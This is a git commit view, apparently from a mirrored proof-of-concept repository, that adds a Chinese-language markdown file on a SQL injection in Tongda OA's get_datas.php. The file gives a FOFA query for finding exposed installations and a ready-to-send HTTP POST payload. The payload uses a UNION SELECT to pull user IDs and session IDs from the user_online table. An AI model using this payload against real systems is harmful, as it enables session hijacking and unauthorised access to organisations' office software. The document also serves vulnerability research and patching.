mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 通达OA get_datas.php前台sql注入.md
This commit is contained in:
parent
bac60018ab
commit
2e8574a443
27
通达OA get_datas.php前台sql注入.md
Normal file
27
通达OA get_datas.php前台sql注入.md
Normal file
@ -0,0 +1,27 @@
|
||||
## 通达OA get_datas.php前台sql注入
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="TDXK-通达OA"
|
||||
```
|
||||
|
||||
## POC
|
||||
```
|
||||
|
||||
post /general/reportshop/utils/get_datas.php HTTP/1.1
|
||||
Host: {{HostName}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||
Content-Length: 2
|
||||
|
||||
USER_ID=OfficeTask&PASSWORD=&col=1,1&tab=5 where 1={`\='` 1} union (select uid,sid from user_online where 1\={`=` 1})-- '1**
|
||||
```
|
||||

|
||||
|
||||

|
||||
|
||||
|
||||
## 漏洞来源
|
||||
```
|
||||
https://forum.butian.net/share/278
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user